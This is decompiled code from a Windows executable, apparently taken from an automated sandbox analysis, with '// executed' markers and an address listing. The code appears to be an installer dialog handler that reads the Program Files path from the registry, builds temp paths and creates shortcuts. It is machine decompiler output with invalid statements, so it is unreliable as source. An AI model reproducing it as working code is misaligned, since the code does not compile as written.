                                                                                                                                                      								__eflags = __al - 0x2e;
                                                                                                                                                      								if(__al != 0x2e) {
                                                                                                                                                      									L59:
                                                                                                                                                      									__eflags = __al - 0x5c;
                                                                                                                                                      									if(__al == 0x5c) {
                                                                                                                                                      										L53:
                                                                                                                                                      										 &_v1080 = E0040A450( &_v1080, __esi);
                                                                                                                                                      										L54:
                                                                                                                                                      										__eax =  &_v1080;
                                                                                                                                                      										__eax = E0040A3B2(__ecx,  &_v1080, 0x22);
                                                                                                                                                      										__eflags = __eax;
                                                                                                                                                      										if(__eax != 0) {
                                                                                                                                                      											__eflags =  *((char*)(__eax + 1));
                                                                                                                                                      											if( *((char*)(__eax + 1)) == 0) {
                                                                                                                                                      												 *__eax = 0;
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      										 &_v1080 = E0040A450(__ebx,  &_v1080);
                                                                                                                                                      										 &_v1080 = E0040B989(__esi,  &_v1080);
                                                                                                                                                      										__esi = GetDlgItem(_a4, 0x65);
                                                                                                                                                      										 &_v1080 = SetWindowTextA(__esi,  &_v1080); // executed
                                                                                                                                                      										__eax = SendMessageA(__esi, 0x143, 0, __ebx); // executed
                                                                                                                                                      										__eax =  &_v1080;
                                                                                                                                                      										__eax = E0040A4C2(__ebx,  &_v1080);
                                                                                                                                                      										__eflags = __eax;
                                                                                                                                                      										if(__eax != 0) {
                                                                                                                                                      											 &_v1080 = SendMessageA(__esi, 0x143, 0,  &_v1080);
                                                                                                                                                      										}
                                                                                                                                                      										goto L155;
                                                                                                                                                      									}
                                                                                                                                                      									__eflags = __al;
                                                                                                                                                      									if(__al == 0) {
                                                                                                                                                      										L62:
                                                                                                                                                      										__eax =  &_v20;
                                                                                                                                                      										__eax = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v20); // executed
                                                                                                                                                      										__eflags = __eax;
                                                                                                                                                      										if(__eax == 0) {
                                                                                                                                                      											 &_v16 =  &_v1080;
                                                                                                                                                      											__eax =  &_v24;
                                                                                                                                                      											_v16 = 0x400;
                                                                                                                                                      											__eax = RegQueryValueExA(_v20, "ProgramFilesDir", 0,  &_v24,  &_v1080,  &_v16); // executed
                                                                                                                                                      											__eax = RegCloseKey(_v20); // executed
                                                                                                                                                      										}
                                                                                                                                                      										__eflags = _v1080;
                                                                                                                                                      										if(_v1080 != 0) {
                                                                                                                                                      											__eax =  &_v1080;
                                                                                                                                                      											__eax = E0040A35D(__ecx,  &_v1080);
                                                                                                                                                      											__ecx =  &_v1080;
                                                                                                                                                      											__ecx =  &_v1080 - 1;
                                                                                                                                                      											__eflags =  *((char*)(__eax + __ecx)) - 0x5c;
                                                                                                                                                      											if( *((char*)(__eax + __ecx)) != 0x5c) {
                                                                                                                                                      												 &_v1080 = E0040A5BB( &_v1080, "\\");
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      										__edi = E0040A35D(__ecx, __esi);
                                                                                                                                                      										__eax =  &_v1080;
                                                                                                                                                      										__edi = __edi + E0040A35D(__ecx,  &_v1080);
                                                                                                                                                      										__eflags = __edi - 0x3ff;
                                                                                                                                                      										if(__edi < 0x3ff) {
                                                                                                                                                      											 &_v1080 = E0040A5BB( &_v1080, __esi);
                                                                                                                                                      										}
                                                                                                                                                      										goto L54;
                                                                                                                                                      									}
                                                                                                                                                      									__eflags = __esi->i - 0x3a;
                                                                                                                                                      									if(__esi->i == 0x3a) {
                                                                                                                                                      										goto L53;
                                                                                                                                                      									}
                                                                                                                                                      									goto L62;
                                                                                                                                                      								}
                                                                                                                                                      								__eflags = __esi->i - 0x5c;
                                                                                                                                                      								if(__esi->i != 0x5c) {
                                                                                                                                                      									goto L59;
                                                                                                                                                      								}
                                                                                                                                                      								__esi =  &(__esi->i);
                                                                                                                                                      								__eflags = __esi->i;
                                                                                                                                                      								if(__esi->i == 0) {
                                                                                                                                                      									goto L155;
                                                                                                                                                      								}
                                                                                                                                                      								goto L53;
                                                                                                                                                      							}
                                                                                                                                                      						case 4:
                                                                                                                                                      							__eflags =  *0x419f8c - 1;
                                                                                                                                                      							__eflags = __eax - 0x419f8c;
                                                                                                                                                      							 *__edi =  *__edi + __ecx;
                                                                                                                                                      							__eflags = _a1 & __cl;
                                                                                                                                                      							 *__eax =  *__eax + __al;
                                                                                                                                                      							__eflags =  *__eax;
                                                                                                                                                      						case 5:
                                                                                                                                                      							__eax = _v7224;
                                                                                                                                                      							__eax = _v7224;
                                                                                                                                                      							__eflags = __eax;
                                                                                                                                                      							if(__eax == 0) {
                                                                                                                                                      								L81:
                                                                                                                                                      								 *0x419edf = 0;
                                                                                                                                                      								 *0x419ede = 1;
                                                                                                                                                      								goto L155;
                                                                                                                                                      							}
                                                                                                                                                      							__eax = __eax - 0x30;
                                                                                                                                                      							__eflags = __eax;
                                                                                                                                                      							if(__eax == 0) {
                                                                                                                                                      								 *0x419edf = 0;
                                                                                                                                                      								L80:
                                                                                                                                                      								 *0x419ede = 0;
                                                                                                                                                      								goto L155;
                                                                                                                                                      							}
                                                                                                                                                      							__eax = __eax - 1;
                                                                                                                                                      							__eflags = __eax;
                                                                                                                                                      							if(__eax == 0) {
                                                                                                                                                      								goto L81;
                                                                                                                                                      							}
                                                                                                                                                      							__eax = __eax - 1;
                                                                                                                                                      							__eflags = __eax;
                                                                                                                                                      							if(__eax != 0) {
                                                                                                                                                      								goto L155;
                                                                                                                                                      							}
                                                                                                                                                      							 *0x419edf = 1;
                                                                                                                                                      							goto L80;
                                                                                                                                                      						case 6:
                                                                                                                                                      							__eflags = _a12 - 4;
                                                                                                                                                      							if(_a12 != 4) {
                                                                                                                                                      								goto L155;
                                                                                                                                                      							}
                                                                                                                                                      							_push(0);
                                                                                                                                                      							goto L89;
                                                                                                                                                      						case 7:
                                                                                                                                                      							__eflags = _a12 - 1;
                                                                                                                                                      							if(_a12 != 1) {
                                                                                                                                                      								L106:
                                                                                                                                                      								__eflags = _a12 - 7;
                                                                                                                                                      								if(_a12 == 7) {
                                                                                                                                                      									__eflags =  *0x419f8c;
                                                                                                                                                      									if( *0x419f8c == 0) {
                                                                                                                                                      										 *0x419f8c = 2;
                                                                                                                                                      									}
                                                                                                                                                      									 *0x419f88 = 1;
                                                                                                                                                      								}
                                                                                                                                                      								goto L155;
                                                                                                                                                      							}
                                                                                                                                                      							 &_v3128 = GetTempPathA(0x400,  &_v3128);
                                                                                                                                                      							 &_v3128 = E004076A1( &_v3128);
                                                                                                                                                      							_v8 = _v8 & 0x00000000;
                                                                                                                                                      							_push(0);
                                                                                                                                                      							__ebx = "%s%s%d";
                                                                                                                                                      							while(1) {
                                                                                                                                                      								_push( *0x41409c);
                                                                                                                                                      								__eax =  &_v3128;
                                                                                                                                                      								_push( &_v3128);
                                                                                                                                                      								__eax =  &_v2104;
                                                                                                                                                      								_push(__ebx);
                                                                                                                                                      								_push( &_v2104);
                                                                                                                                                      								__eax =  *__edi();
                                                                                                                                                      								__esp = __esp + 0x14;
                                                                                                                                                      								__eax =  &_v2104;
                                                                                                                                                      								_push( &_v2104);
                                                                                                                                                      								__eax = __esi->i();
                                                                                                                                                      								__eflags = __eax - 0xffffffff;
                                                                                                                                                      								if(__eax == 0xffffffff) {
                                                                                                                                                      									break;
                                                                                                                                                      								}
                                                                                                                                                      								_t134 =  &_v8;
                                                                                                                                                      								 *_t134 = _v8 + 1;
                                                                                                                                                      								__eflags =  *_t134;
                                                                                                                                                      								_push(_v8);
                                                                                                                                                      							}
                                                                                                                                                      							 &_v2104 = SetDlgItemTextA(_a4, 0x65,  &_v2104);
                                                                                                                                                      							__eflags = _v7224;
                                                                                                                                                      							if(_v7224 == 0) {
                                                                                                                                                      								goto L155;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags =  *0x41a816;
                                                                                                                                                      							if( *0x41a816 != 0) {
                                                                                                                                                      								goto L155;
                                                                                                                                                      							}
                                                                                                                                                      							__eax =  &_v7224;
                                                                                                                                                      							_v568 = 0;
                                                                                                                                                      							__eax = E0040A386( &_v7224, 0x2c);
                                                                                                                                                      							__eflags = __eax;
                                                                                                                                                      							if(__eax != 0) {
                                                                                                                                                      								L102:
                                                                                                                                                      								__eflags = _v568;
                                                                                                                                                      								if(_v568 == 0) {
                                                                                                                                                      									 &_v46304 =  &_v7224;
                                                                                                                                                      									E0040A450( &_v7224,  &_v46304) =  &_v42208;
                                                                                                                                                      									 &_v568 = E0040A450( &_v568,  &_v42208);
                                                                                                                                                      								}
                                                                                                                                                      								 &_v7224 = E0040AB7A( &_v7224);
                                                                                                                                                      								 &_v568 =  &_v7224;
                                                                                                                                                      								_v5176 = 0;
                                                                                                                                                      								__eax = MessageBoxA(_a4,  &_v7224,  &_v568, 0x24);
                                                                                                                                                      								__eflags = __eax - 6;
                                                                                                                                                      								if(__eax == 6) {
                                                                                                                                                      									goto L155;
                                                                                                                                                      								} else {
                                                                                                                                                      									0 = 1;
                                                                                                                                                      									__eflags = 1;
                                                                                                                                                      									 *0x41a815 = 1;
                                                                                                                                                      									 *0x419f78 = 1;
                                                                                                                                                      									__eax = EndDialog(_a4, 1);
                                                                                                                                                      									goto L106;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							__esi = 0;
                                                                                                                                                      							__eflags = _v7224;
                                                                                                                                                      							if(_v7224 == 0) {
                                                                                                                                                      								goto L102;
                                                                                                                                                      							} else {
                                                                                                                                                      								goto L98;
                                                                                                                                                      							}
                                                                                                                                                      							while(1) {
                                                                                                                                                      								L98:
                                                                                                                                                      								__eflags =  *((char*)(__ebp + __esi - 0x1c34)) - 0x40;
                                                                                                                                                      								if( *((char*)(__ebp + __esi - 0x1c34)) == 0x40) {
                                                                                                                                                      									break;
                                                                                                                                                      								}
                                                                                                                                                      								__esi =  &(__esi->i);
                                                                                                                                                      								__eflags =  *((char*)(__ebp + __esi - 0x1c34));
                                                                                                                                                      								if( *((char*)(__ebp + __esi - 0x1c34)) != 0) {
                                                                                                                                                      									continue;
                                                                                                                                                      								}
                                                                                                                                                      								goto L102;
                                                                                                                                                      							}
                                                                                                                                                      							__ebp + __esi - 0x1c33 =  &_v568;
                                                                                                                                                      							__eax = E0040A450( &_v568, __ebp + __esi - 0x1c33);
                                                                                                                                                      							 *((char*)(__ebp + __esi - 0x1c34)) = 0;
                                                                                                                                                      							goto L102;
                                                                                                                                                      						case 8:
                                                                                                                                                      							__eflags = _a12 - 3;
                                                                                                                                                      							if(_a12 == 3) {
                                                                                                                                                      								__eflags = _v7224;
                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                      									 &_v7224 = SetWindowTextA(_a4,  &_v7224);
                                                                                                                                                      								}
                                                                                                                                                      								__esi =  &_a8;
                                                                                                                                                      								 *0x41a820 = E0040B793(__esi, __eflags);
                                                                                                                                                      							}
                                                                                                                                                      							 *0x41a817 = 1;
                                                                                                                                                      							goto L155;
                                                                                                                                                      						case 9:
                                                                                                                                                      							__eflags = _a12 - 5;
                                                                                                                                                      							if(_a12 != 5) {
                                                                                                                                                      								goto L155;
                                                                                                                                                      							}
                                                                                                                                                      							_push(1);
                                                                                                                                                      							L89:
                                                                                                                                                      							 &_v7224 = E0040BD59( &_v7224, __ecx); // executed
                                                                                                                                                      							goto L155;
                                                                                                                                                      						case 0xa:
                                                                                                                                                      							__eflags = _a12 - 6;
                                                                                                                                                      							if(_a12 != 6) {
                                                                                                                                                      								goto L155;
                                                                                                                                                      							}
                                                                                                                                                      							__eax = _v46304;
                                                                                                                                                      							__eax = E0040A229(__ecx, _v46304);
                                                                                                                                                      							__eax = __eax - 0x50;
                                                                                                                                                      							__eflags = __eax;
                                                                                                                                                      							if(__eax == 0) {
                                                                                                                                                      								_v8 = 2;
                                                                                                                                                      							} else {
                                                                                                                                                      								__eax = __eax - 3;
                                                                                                                                                      								__eflags = __eax;
                                                                                                                                                      								if(__eax == 0) {
                                                                                                                                                      									_v8 = 0xb;
                                                                                                                                                      								} else {
                                                                                                                                                      									__eax = __eax - 1;
                                                                                                                                                      									__eflags = __eax;
                                                                                                                                                      									if(__eax == 0) {
                                                                                                                                                      										_v8 = 7;
                                                                                                                                                      									} else {
                                                                                                                                                      										_v8 = 0x10;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							 &_v42208 =  &_v3128;
                                                                                                                                                      							_v8248 = 0;
                                                                                                                                                      							_v2104 = 0;
                                                                                                                                                      							__eax = E0040A450( &_v3128,  &_v42208);
                                                                                                                                                      							__eflags = _v3128 - 0x22;
                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                      								 &_v3128 = E0040572E(__eflags,  &_v3128, 0);
                                                                                                                                                      								__eflags = __al;
                                                                                                                                                      								if(__al != 0) {
                                                                                                                                                      									goto L142;
                                                                                                                                                      								}
                                                                                                                                                      								__edi = 0;
                                                                                                                                                      								__eflags = _v3128;
                                                                                                                                                      								__esi =  &_v3128;
                                                                                                                                                      								if(_v3128 == 0) {
                                                                                                                                                      									goto L142;
                                                                                                                                                      								} else {
                                                                                                                                                      									goto L130;
                                                                                                                                                      								}
                                                                                                                                                      								do {
                                                                                                                                                      									L130:
                                                                                                                                                      									__bl = __esi->i;
                                                                                                                                                      									__eflags = __bl - 0x20;
                                                                                                                                                      									if(__eflags == 0) {
                                                                                                                                                      										L132:
                                                                                                                                                      										__eax =  &_v3128;
                                                                                                                                                      										__esi->i = 0;
                                                                                                                                                      										__eax = E0040572E(__eflags,  &_v3128, 0);
                                                                                                                                                      										__eflags = __al;
                                                                                                                                                      										if(__al == 0) {
                                                                                                                                                      											__esi->i = __bl;
                                                                                                                                                      											goto L139;
                                                                                                                                                      										}
                                                                                                                                                      										__edi = __esi;
                                                                                                                                                      										__eflags = __bl - 0x2f;
                                                                                                                                                      										if(__bl != 0x2f) {
                                                                                                                                                      											do {
                                                                                                                                                      												__esi =  &(__esi->i);
                                                                                                                                                      												__eflags = __esi->i - 0x20;
                                                                                                                                                      											} while (__esi->i == 0x20);
                                                                                                                                                      											_push(__esi);
                                                                                                                                                      											__eax =  &_v2104;
                                                                                                                                                      											L137:
                                                                                                                                                      											_push(__eax);
                                                                                                                                                      											__eax = E0040A450();
                                                                                                                                                      											 *__edi = __bl;
                                                                                                                                                      											goto L139;
                                                                                                                                                      										}
                                                                                                                                                      										_t192 =  &(__esi->i); // 0x1
                                                                                                                                                      										__eax = _t192;
                                                                                                                                                      										_push(_t192);
                                                                                                                                                      										_v2104 = __bl;
                                                                                                                                                      										__eax =  &_v2103;
                                                                                                                                                      										goto L137;
                                                                                                                                                      									}
                                                                                                                                                      									__eflags = __bl - 0x2f;
                                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                                      										goto L139;
                                                                                                                                                      									}
                                                                                                                                                      									goto L132;
                                                                                                                                                      									L139:
                                                                                                                                                      									__esi =  &(__esi->i);
                                                                                                                                                      									__eflags = __esi->i;
                                                                                                                                                      								} while (__esi->i != 0);
                                                                                                                                                      								__eflags = __edi;
                                                                                                                                                      								if(__edi != 0) {
                                                                                                                                                      									 *__edi = 0;
                                                                                                                                                      								}
                                                                                                                                                      								goto L142;
                                                                                                                                                      							} else {
                                                                                                                                                      								 &_v42207 =  &_v3128;
                                                                                                                                                      								E0040A450( &_v3128,  &_v42207) =  &_v3127;
                                                                                                                                                      								__eax = E00407384( &_v3127, 0x22);
                                                                                                                                                      								__eflags = __eax;
                                                                                                                                                      								if(__eax != 0) {
                                                                                                                                                      									 *__eax = 0;
                                                                                                                                                      									 &_v2104 = E0040A450( &_v2104,  &_v2104);
                                                                                                                                                      								}
                                                                                                                                                      								L142:
                                                                                                                                                      								__eflags = _v25824;
                                                                                                                                                      								if(_v25824 != 0) {
                                                                                                                                                      									 &_v8248 =  &_v25824;
                                                                                                                                                      									__eax = E004057E4( &_v25824,  &_v8248);
                                                                                                                                                      								}
                                                                                                                                                      								 &_v17632 =  &_v3128;
                                                                                                                                                      								E004057E4( &_v3128,  &_v17632) =  &_v1080;
                                                                                                                                                      								__eax = E0040AA9B(__ecx,  &_v1080, _v8); // executed
                                                                                                                                                      								 &_v1080 = E004076A1( &_v1080);
                                                                                                                                                      								__eflags = _v38112;
                                                                                                                                                      								if(_v38112 != 0) {
                                                                                                                                                      									 &_v38112 =  &_v1080;
                                                                                                                                                      									E0040A5BB( &_v1080,  &_v38112) =  &_v1080;
                                                                                                                                                      									__eax = E004076A1( &_v1080);
                                                                                                                                                      								}
                                                                                                                                                      								 &_v1080 =  &_v13528;
                                                                                                                                                      								__eax = E0040A450( &_v13528,  &_v1080);
                                                                                                                                                      								__eflags = _v29920;
                                                                                                                                                      								__eax =  &_v29920;
                                                                                                                                                      								if(_v29920 == 0) {
                                                                                                                                                      									__eax =  &_v42208;
                                                                                                                                                      								}
                                                                                                                                                      								 &_v1080 = E0040A5BB( &_v1080,  &_v1080);
                                                                                                                                                      								__eax =  &_v1080;
                                                                                                                                                      								__eax = E00407669( &_v1080);
                                                                                                                                                      								__eflags = __eax;
                                                                                                                                                      								if(__eax == 0) {
                                                                                                                                                      									L150:
                                                                                                                                                      									 &_v1080 = E0040A5BB( &_v1080, ".lnk");
                                                                                                                                                      									goto L151;
                                                                                                                                                      								} else {
                                                                                                                                                      									__eax = E0040A573(__eax, ".lnk");
                                                                                                                                                      									__eflags = __eax;
                                                                                                                                                      									if(__eax == 0) {
                                                                                                                                                      										L151:
                                                                                                                                                      										 &_v1080 = E004058C1(__ebx, __esi,  &_v1080, 0, 1); // executed
                                                                                                                                                      										_v2104 =  ~_v2104;
                                                                                                                                                      										asm("sbb eax, eax");
                                                                                                                                                      										__ecx =  &_v2104;
                                                                                                                                                      										 ~_v2104 &  &_v2104 = _v8248;
                                                                                                                                                      										__eax =  ~_v8248;
                                                                                                                                                      										asm("sbb eax, eax");
                                                                                                                                                      										__ecx =  &_v8248;
                                                                                                                                                      										 ~_v8248 &  &_v8248 = _v34016;
                                                                                                                                                      										__eax =  ~_v34016;
                                                                                                                                                      										asm("sbb eax, eax");
                                                                                                                                                      										__ecx =  &_v34016;
                                                                                                                                                      										 ~_v34016 &  &_v34016 =  &_v1080;
                                                                                                                                                      										 &_v17632 = E0040A996( &_v17632,  &_v1080,  ~_v34016 &  &_v34016,  ~_v8248 &  &_v8248,  ~_v2104 &  &_v2104); // executed
                                                                                                                                                      										__eflags = _v13528;
                                                                                                                                                      										if(_v13528 != 0) {
                                                                                                                                                      											__eax =  &_v13528;
                                                                                                                                                      											SHChangeNotify(0x1000, 1,  &_v13528, 0); // executed
                                                                                                                                                      										}
                                                                                                                                                      										goto L155;
                                                                                                                                                      									}
                                                                                                                                                      									goto L150;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						case 0xb:
                                                                                                                                                      							__eflags = _a12 - 7;
                                                                                                                                                      							if(_a12 == 7) {
                                                                                                                                                      								 *0x419f90 = 1;
                                                                                                                                                      							}
                                                                                                                                                      							goto L155;
                                                                                                                                                      						case 0xc:
                                                                                                                                                      							__eax = _v7224;
                                                                                                                                                      							__eax = E0040A229(__ecx, _v7224);
                                                                                                                                                      							__eflags = __eax - 0x46;
                                                                                                                                                      							if(__eax == 0x46) {
                                                                                                                                                      								 *0x419edd = 1;
                                                                                                                                                      							} else {
                                                                                                                                                      								__eflags = __eax - 0x55;
                                                                                                                                                      								if(__eax == 0x55) {
                                                                                                                                                      									 *0x419edc = 1;
                                                                                                                                                      								} else {
                                                                                                                                                      									 *0x419edd = 0;
                                                                                                                                                      									 *0x419edc = 0;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							goto L155;
                                                                                                                                                      					}
                                                                                                                                                      					L4:
                                                                                                                                                      					E0040A8FE( &_v7224, _v8);
                                                                                                                                                      					_v8 = _v8 + 0x1000;
                                                                                                                                                      					_t15 =  &_v16;
                                                                                                                                                      					 *_t15 = _v16 - 1;
                                                                                                                                                      					if( *_t15 != 0) {
                                                                                                                                                      						goto L4;
                                                                                                                                                      					} else {
                                                                                                                                                      						_v8 = _v8 & 0x00000000;
                                                                                                                                                      						goto L6;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      			}





































                                                                                                                                                      0x0040bf72
                                                                                                                                                      0x0040bf7a
                                                                                                                                                      0x0040bf83
                                                                                                                                                      0x0040ca3e
                                                                                                                                                      0x0040ca3e
                                                                                                                                                      0x0040bfa8
                                                                                                                                                      0x0040bfad
                                                                                                                                                      0x0040bfb2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bfb8
                                                                                                                                                      0x0040bfb9
                                                                                                                                                      0x0040bfb9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bffa
                                                                                                                                                      0x0040c015
                                                                                                                                                      0x0040c01c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c01e
                                                                                                                                                      0x0040ca0c
                                                                                                                                                      0x0040ca2a
                                                                                                                                                      0x0040ca2f
                                                                                                                                                      0x0040ca33
                                                                                                                                                      0x0040ca39
                                                                                                                                                      0x0040ca39
                                                                                                                                                      0x0040c01c
                                                                                                                                                      0x0040c027
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c030
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c037
                                                                                                                                                      0x0040c03b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c04d
                                                                                                                                                      0x0040c061
                                                                                                                                                      0x0040c06d
                                                                                                                                                      0x0040c080
                                                                                                                                                      0x0040c08b
                                                                                                                                                      0x0040c09d
                                                                                                                                                      0x0040c0a8
                                                                                                                                                      0x0040c0ad
                                                                                                                                                      0x0040c0b6
                                                                                                                                                      0x0040c0bc
                                                                                                                                                      0x0040c0c1
                                                                                                                                                      0x0040c0c3
                                                                                                                                                      0x0040c22f
                                                                                                                                                      0x0040c235
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c0c9
                                                                                                                                                      0x0040c0c9
                                                                                                                                                      0x0040c0ce
                                                                                                                                                      0x0040c0d7
                                                                                                                                                      0x0040c0dd
                                                                                                                                                      0x0040c0e4
                                                                                                                                                      0x0040c194
                                                                                                                                                      0x0040c19b
                                                                                                                                                      0x0040c19d
                                                                                                                                                      0x0040c1a0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c1a9
                                                                                                                                                      0x0040c1af
                                                                                                                                                      0x0040c1b1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c1b3
                                                                                                                                                      0x0040c1b3
                                                                                                                                                      0x0040c1b6
                                                                                                                                                      0x0040c1b7
                                                                                                                                                      0x0040c1bf
                                                                                                                                                      0x0040c1ce
                                                                                                                                                      0x0040c1d0
                                                                                                                                                      0x0040c1da
                                                                                                                                                      0x0040c1dc
                                                                                                                                                      0x0040c1df
                                                                                                                                                      0x0040c1b9
                                                                                                                                                      0x0040c1b9
                                                                                                                                                      0x0040c1b9
                                                                                                                                                      0x0040c1bc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c1e1
                                                                                                                                                      0x0040c1ef
                                                                                                                                                      0x0040c1f5
                                                                                                                                                      0x0040c1f7
                                                                                                                                                      0x0040c1f9
                                                                                                                                                      0x0040c1fe
                                                                                                                                                      0x0040c200
                                                                                                                                                      0x0040c20d
                                                                                                                                                      0x0040c20d
                                                                                                                                                      0x0040c200
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c1f7
                                                                                                                                                      0x0040c1df
                                                                                                                                                      0x0040c1b1
                                                                                                                                                      0x0040c0ef
                                                                                                                                                      0x0040c0f2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c106
                                                                                                                                                      0x0040c112
                                                                                                                                                      0x0040c11e
                                                                                                                                                      0x0040c123
                                                                                                                                                      0x0040c126
                                                                                                                                                      0x0040c129
                                                                                                                                                      0x0040c13c
                                                                                                                                                      0x0040c145
                                                                                                                                                      0x0040c14a
                                                                                                                                                      0x0040c14c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c152
                                                                                                                                                      0x0040c160
                                                                                                                                                      0x0040c16e
                                                                                                                                                      0x0040c173
                                                                                                                                                      0x0040c175
                                                                                                                                                      0x0040c176
                                                                                                                                                      0x0040c180
                                                                                                                                                      0x0040c187
                                                                                                                                                      0x0040c18e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c18e
                                                                                                                                                      0x0040c132
                                                                                                                                                      0x0040c137
                                                                                                                                                      0x0040c13a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c213
                                                                                                                                                      0x0040c213
                                                                                                                                                      0x0040c21c
                                                                                                                                                      0x0040c222
                                                                                                                                                      0x0040c227
                                                                                                                                                      0x0040c227
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c0ce
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c23f
                                                                                                                                                      0x0040c243
                                                                                                                                                      0x0040c249
                                                                                                                                                      0x0040c24e
                                                                                                                                                      0x0040c250
                                                                                                                                                      0x0040c253
                                                                                                                                                      0x0040c255
                                                                                                                                                      0x0040c25d
                                                                                                                                                      0x0040c25d
                                                                                                                                                      0x0040c262
                                                                                                                                                      0x0040c266
                                                                                                                                                      0x0040c270
                                                                                                                                                      0x0040c278
                                                                                                                                                      0x0040c268
                                                                                                                                                      0x0040c268
                                                                                                                                                      0x0040c268
                                                                                                                                                      0x0040c27a
                                                                                                                                                      0x0040c27c
                                                                                                                                                      0x0040c28d
                                                                                                                                                      0x0040c27e
                                                                                                                                                      0x0040c27e
                                                                                                                                                      0x0040c27e
                                                                                                                                                      0x0040c295
                                                                                                                                                      0x0040c2a0
                                                                                                                                                      0x0040c2a5
                                                                                                                                                      0x0040c2aa
                                                                                                                                                      0x0040c2ac
                                                                                                                                                      0x0040c2ae
                                                                                                                                                      0x0040c2ae
                                                                                                                                                      0x0040c2b3
                                                                                                                                                      0x0040c2b8
                                                                                                                                                      0x0040c2bc
                                                                                                                                                      0x0040c2c3
                                                                                                                                                      0x0040c2c3
                                                                                                                                                      0x0040c2bc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c2cd
                                                                                                                                                      0x0040c2d1
                                                                                                                                                      0x0040c2e1
                                                                                                                                                      0x0040c2e1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c2ec
                                                                                                                                                      0x0040c2f0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c2f6
                                                                                                                                                      0x0040c2fd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c303
                                                                                                                                                      0x0040c30a
                                                                                                                                                      0x0040c310
                                                                                                                                                      0x0040c317
                                                                                                                                                      0x0040c319
                                                                                                                                                      0x0040c319
                                                                                                                                                      0x0040c320
                                                                                                                                                      0x0040c325
                                                                                                                                                      0x0040c32a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c330
                                                                                                                                                      0x0040c330
                                                                                                                                                      0x0040c332
                                                                                                                                                      0x0040c334
                                                                                                                                                      0x0040c3ea
                                                                                                                                                      0x0040c3ea
                                                                                                                                                      0x0040c3ec
                                                                                                                                                      0x0040c350
                                                                                                                                                      0x0040c358
                                                                                                                                                      0x0040c35d
                                                                                                                                                      0x0040c35f
                                                                                                                                                      0x0040c366
                                                                                                                                                      0x0040c36b
                                                                                                                                                      0x0040c36d
                                                                                                                                                      0x0040c36f
                                                                                                                                                      0x0040c373
                                                                                                                                                      0x0040c375
                                                                                                                                                      0x0040c375
                                                                                                                                                      0x0040c373
                                                                                                                                                      0x0040c380
                                                                                                                                                      0x0040c38c
                                                                                                                                                      0x0040c39c
                                                                                                                                                      0x0040c3a6
                                                                                                                                                      0x0040c3b5
                                                                                                                                                      0x0040c3bb
                                                                                                                                                      0x0040c3c3
                                                                                                                                                      0x0040c3c8
                                                                                                                                                      0x0040c3ca
                                                                                                                                                      0x0040c3df
                                                                                                                                                      0x0040c3df
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c3ca
                                                                                                                                                      0x0040c3f2
                                                                                                                                                      0x0040c3f4
                                                                                                                                                      0x0040c400
                                                                                                                                                      0x0040c400
                                                                                                                                                      0x0040c412
                                                                                                                                                      0x0040c418
                                                                                                                                                      0x0040c41a
                                                                                                                                                      0x0040c420
                                                                                                                                                      0x0040c427
                                                                                                                                                      0x0040c435
                                                                                                                                                      0x0040c43c
                                                                                                                                                      0x0040c445
                                                                                                                                                      0x0040c445
                                                                                                                                                      0x0040c44b
                                                                                                                                                      0x0040c452
                                                                                                                                                      0x0040c454
                                                                                                                                                      0x0040c45b
                                                                                                                                                      0x0040c460
                                                                                                                                                      0x0040c466
                                                                                                                                                      0x0040c467
                                                                                                                                                      0x0040c46b
                                                                                                                                                      0x0040c479
                                                                                                                                                      0x0040c479
                                                                                                                                                      0x0040c46b
                                                                                                                                                      0x0040c484
                                                                                                                                                      0x0040c486
                                                                                                                                                      0x0040c492
                                                                                                                                                      0x0040c494
                                                                                                                                                      0x0040c49a
                                                                                                                                                      0x0040c4a8
                                                                                                                                                      0x0040c4a8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c49a
                                                                                                                                                      0x0040c3f6
                                                                                                                                                      0x0040c3fa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c3fa
                                                                                                                                                      0x0040c33a
                                                                                                                                                      0x0040c33e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
